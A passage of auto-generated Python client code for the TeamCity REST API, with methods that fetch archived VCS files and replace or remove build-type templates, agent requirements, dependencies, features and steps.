:param str name:
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'bt_locator', 'base_path', 'locator', 'name', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zipped" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_zipped`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_zipped`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_zipped`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest/archived{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __remove_all_templates_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""remove_all_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__remove_all_templates_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param bool inline_settings:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'inline_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_all_templates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `remove_all_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'inline_settings' in params:
query_params.append(('inlineSettings', params['inline_settings'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __remove_template_with_http_info(self, bt_locator, template_locator, **kwargs): # noqa: E501
"""remove_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__remove_template_with_http_info(bt_locator, template_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str template_locator: (required)
:param bool inline_settings:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'template_locator', 'inline_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `remove_template`") # noqa: E501
# verify the required parameter 'template_locator' is set
if ('template_locator' not in params or
params['template_locator'] is None):
raise ValueError("Missing the required parameter `template_locator` when calling `remove_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'template_locator' in params:
if isinstance(params['template_locator'], TeamCityObject):
path_params['templateLocator'] = params['template_locator'].locator_id
else:
path_params['templateLocator'] = params['template_locator'] # noqa: E501
query_params = []
if 'inline_settings' in params:
query_params.append(('inlineSettings', params['inline_settings'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates/{templateLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_agent_requirement_with_http_info(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""replace_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str fields:
:param AgentRequirement body:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_agent_requirement" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_agent_requirement`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `replace_agent_requirement`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentRequirement', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_agent_requirements_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_agent_requirements # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_agent_requirements_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param AgentRequirements body:
:return: AgentRequirements
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_agent_requirements" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_agent_requirements`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentRequirements', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_artifact_dep_with_http_info(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""replace_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str fields:
:param ArtifactDependency body:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'artifact_dep_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_artifact_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_artifact_dep`") # noqa: E501
# verify the required parameter 'artifact_dep_locator' is set
if ('artifact_dep_locator' not in params or
params['artifact_dep_locator'] is None):
raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `replace_artifact_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'artifact_dep_locator' in params:
if isinstance(params['artifact_dep_locator'], TeamCityObject):
path_params['artifactDepLocator'] = params['artifact_dep_locator'].locator_id
else:
path_params['artifactDepLocator'] = params['artifact_dep_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArtifactDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_artifact_deps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_artifact_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_artifact_deps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param ArtifactDependencies body:
:return: ArtifactDependencies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_artifact_deps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_artifact_deps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArtifactDependencies', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_feature_with_http_info(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""replace_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_feature_with_http_info(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:param Feature body:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_feature`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `replace_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Feature', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_feature_parameters_with_http_info(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""replace_feature_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_feature_parameters_with_http_info(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_feature_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_feature_parameters`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `replace_feature_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_features_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_features # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_features_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param Features body:
:return: Features
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_features" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_features`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Features', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_snapshot_dep_with_http_info(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""replace_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:param str fields:
:param SnapshotDependency body:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'snapshot_dep_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_snapshot_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_snapshot_dep`") # noqa: E501
# verify the required parameter 'snapshot_dep_locator' is set
if ('snapshot_dep_locator' not in params or
params['snapshot_dep_locator'] is None):
raise ValueError("Missing the required parameter `snapshot_dep_locator` when calling `replace_snapshot_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'snapshot_dep_locator' in params:
if isinstance(params['snapshot_dep_locator'], TeamCityObject):
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'].locator_id
else:
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies/{snapshotDepLocator}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_snapshot_deps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_snapshot_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_snapshot_deps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param SnapshotDependencies body:
:return: SnapshotDependencies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_snapshot_deps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_snapshot_deps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependencies', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_step_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""replace_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_step_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:param Step body:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_step" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_step`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `replace_step`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Step', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_step_parameters_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""replace_step_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_step_parameters_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_step_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_step_parameters`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `replace_step_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_steps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_steps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_steps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param Steps body:
:return: Steps
If the method is called asynchronously,
returns the request thread.
"""
